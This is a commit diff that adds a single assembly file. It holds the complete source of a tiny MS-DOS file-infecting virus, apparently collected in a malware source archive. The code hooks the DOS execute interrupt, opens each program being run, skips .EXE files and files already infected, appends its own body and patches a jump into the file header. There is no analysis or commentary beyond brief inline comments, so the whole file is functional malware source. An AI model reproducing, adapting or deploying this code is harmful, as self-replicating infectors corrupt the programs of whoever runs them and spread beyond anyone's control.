Add files via upload

MSDOS/Virus.MSDOS.Unknown.tiny-133.asm

@@ -0,0 +1,81 @@
+VSize		=	085h
+
+Code		Segment
+		Assume	CS:Code
+		Org	600h
+
+Bytes		db	0CDh,20h,90h,90h
+
+Start:		mov	si, 0100h
+		mov	bx, offset Int21
+		mov	cx, 0050h
+		mov	di, si
+		add	si, [si+2]
+		push	di
+		movsw
+		movsw
+		mov	es, cx
+		cmpsb
+		je	StartFile
+		dec	si
+		dec	di
+	rep	movsw
+		mov	es, cx
+		xchg	ax, bx
+		xchg	ax, cx
+Loop0:		xchg	ax, cx
+		xchg	ax, word ptr es:[di-120h]
+		stosw
+		jcxz	Loop0
+		xchg	ax, bx
+StartFile:
+		push	ds
+		pop	es
+		ret
+
+Int21:		cmp	ax, 4B00h
+		jne	End21
+Exec:		push	ax bx dx ds es
+		mov	ax, 3D02h
+		call	DoInt21
+		jc	EndExec
+		cbw			; Zero AH
+		cwd			; Zero DX
+		mov	bx, si		; Move handle to BX
+		mov	ds, ax		; Set DS and ES to 60h,
+		mov	es, ax		;  the virus data segment
+		mov	ah, 3Fh		; Read first 4 bytes
+		int	69h
+		mov	al, 4Dh
+		scasb			; Check for 4D5Ah or infected file mark
+		je	Close		; .EXE or already infected
+		mov	al, 2
+		call	LSeek	; Seek to the end, SI now contains file size
+		mov	cl, VSize	; Virus size in CX, prepare to write
+		int	69h		; AH is 40h, i.e. Write operation
+		mov	ax, 0E94Dh	; Virus header in AX
+		stosw			; Store it
+		xchg	ax, si		; Move file size in AX
+		stosw			; Complete JMP instruction
+		xchg	ax, dx		; Zero AX
+		call	LSeek		; Seek to the beginning
+		int	69h		; AH is 40h, write the virus header
+Close:		mov	ah,3Eh		; Close the file
+		int	69h
+EndExec:	pop	es ds dx bx ax
+End21:		jmp	dword ptr cs:[69h * 4]
+
+LSeek:		mov	ah, 42h		; Seek operation
+		cwd			; Zero DX
+DoInt21:	xor	cx, cx		; External entry for Open, zero cx
+		int	69h
+		mov	cl, 4		; 4 bytes will be read/written
+		xchg	ax, si		; Store AX in SI
+		mov	ax, 4060h	; Prepare AH for Write
+		xor	di, di		; Zero DI
+		ret
+
+VLen		=	$ - offset Bytes
+
+Code		EndS
+		End